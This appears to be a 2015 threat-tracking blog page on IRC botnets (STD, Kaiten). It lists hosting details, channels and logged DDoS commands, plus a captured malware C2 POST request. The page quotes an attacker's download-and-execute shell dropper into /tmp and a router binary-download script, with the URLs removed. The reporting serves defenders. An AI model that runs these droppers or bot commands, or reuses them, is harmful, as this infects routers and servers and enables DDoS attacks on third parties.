Month: April 2015

Botnet hosted in Ukraine Kiev Blazingfast Llc)

Another STD botnet found by abigail.

Server :
Port : 443
Channel : #secgod

DDOS Coming Up :

<~Broken> >bot +std 80 30
[STD]Hitting!
[STD]Done hitting!
<~Broken> >bot +stop
Killing pid 13923.

Other url :

#!/bin/sh
cd /tmp && wget && chmod +x mosh && ./mosh
cd /tmp && wget

Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)

Found by abigail

Server :
Port : 443
Channel : #sh

DDOS Coming Up lol :

<~Haze> >bot +std 80 120
[STD]Hitting!
[STD]Hitting!
[STD]Done hitting!
[STD]Done hitting!

You can download the bot here.

Other :

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR

malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)

Domains used by the malware:

HTTP Requests:

URI:
DATA:

POST /dffgbDFGvf465/YYf.php HTTP/1.0
Host:
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 272
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

samples: